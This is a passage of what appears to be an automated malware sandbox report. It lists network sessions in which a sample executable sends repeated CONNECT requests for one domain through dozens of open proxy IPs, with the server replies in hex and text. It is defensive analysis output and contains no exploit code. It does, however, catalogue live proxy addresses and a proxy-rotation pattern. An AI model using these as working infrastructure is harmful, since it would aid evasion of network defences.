74 65 3e 0a 0a 3c 70 20 69 64 3d 22 73 79 73 6d 73 67 22 3e 54 68 65 20 73 79 73 74 65 6d 20 72 65 74 75 72 6e 65 64 3a 20 3c 69 3e 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 69 3e 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 68 72 3e 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 3e 47 65 6e 65 72 61 74 65 64 20 46 72 69 2c 20 32 33 20 46 65 62 20 32 30 32 34 20 30 38 3a 34 35 3a 33 34 20 47 4d 54 20 62 79 20 45 72 69 63 6f 6d 20 28 65 73 2d 70 72 6f 78 79 2d 61 75 74 68 29 3c 2f 70 3e 0a 3c 21 2d 2d 20 45 52 52
                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id=ERR_CANNOT_FORWARD><div id="titles"><h1>ERROR</h1><h2>The requested URL could not be retrieved</h2></div><hr><div id="content"><p>The following error was encountered while trying to retrieve the URL: <a href="https://heygirlisheeverythingyouwantedinaman.com/*">https://heygirlisheeverythingyouwantedinaman.com/*</a></p><blockquote id="error"><p><b>Shield is unable to forward your request to the configured upstream..</b></p></blockquote><p id="sysmsg">The system returned: <i>Please try again later.</i></p><br></div><hr><div id="footer"><p>Generated Fri, 23 Feb 2024 08:45:34 GMT by Ericom (es-proxy-auth)</p>... ERR


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1941192.168.2.45530970.166.167.38577286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.506098986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1942192.168.2.455331211.234.125.34436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.511212111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1943192.168.2.45531618.135.133.11631286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.537944078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.698354006 CET169INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:33 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: Servlet/2.4
                                                                                                      Server: squid/6.0.0-20220501-re899e0c27
                                                                                                      Content-Length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1944192.168.2.45475882.210.56.251806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.555459976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:58.620578051 CET725INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:58 GMT
                                                                                                      Server: Apache/2.4.54 (Debian)
                                                                                                      Content-Length: 533
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 73 65 72 67 65 2e 6d 6f 72 61 6e 64 40 66 72 65 65 2e 66 72 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at serge.morand@free.fr to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1945192.168.2.453681146.59.70.2961476812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.555865049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.147049904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1946192.168.2.455120162.240.19.133386736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.555871964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.646858931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.647180080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1947192.168.2.455317193.239.58.9280816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.562845945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1948192.168.2.454823199.116.114.1141456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.615292072 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1949192.168.2.455345202.159.60.654436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.615355968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1950192.168.2.45535041.86.252.914436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.615387917 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1951192.168.2.454910125.227.225.15733896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.615427017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.647130013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1952192.168.2.455362218.145.131.1824436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.615432024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1953192.168.2.453664147.45.43.59345556812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.616822958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.647130013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.647434950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:45.646873951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1954192.168.2.45533345.179.231.21056786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.617733002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1955192.168.2.45532647.242.234.237806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.620946884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1956192.168.2.455352104.21.194.182806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.622014046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.709332943 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:33 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1957192.168.2.455327159.223.71.71537416812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.622062922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1958192.168.2.455332125.228.143.20741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.622155905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1959192.168.2.455371185.162.231.226806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.622160912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.709527016 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:33 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1960192.168.2.45539543.153.81.604436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.648627043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1961192.168.2.4553653.123.150.19231286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.709209919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.882087946 CET148INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:33 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: Servlet/2.4
                                                                                                      Server: squid/4.14
                                                                                                      Content-Length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1962192.168.2.45535185.214.118.98806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.709739923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.889471054 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.23.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:33 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1963192.168.2.45537745.43.239.168270706812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.722364902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1964192.168.2.454798107.180.101.18216436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.722558022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.795377016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.834644079 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1965192.168.2.455374193.239.56.8480816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.723299980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1966192.168.2.455391104.16.72.45806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.723622084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.811713934 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:33 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1967192.168.2.45542845.144.30.1994436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.743360043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1968192.168.2.455340110.12.211.140806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.750678062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1969192.168.2.45537020.210.113.3281236812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.767560005 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.045643091 CET319INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:33 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 17
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      X-Cache: MISS from cdn-fintech.info
                                                                                                      X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                      Data Ascii: ERR_ACCESS_DENIED


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1970192.168.2.4554045.161.98.204220196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.767807961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.147114992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.557781935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:35.334749937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.647130013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:39.089510918 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.943835974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1971192.168.2.455364154.12.178.107299856812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:33.786134958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
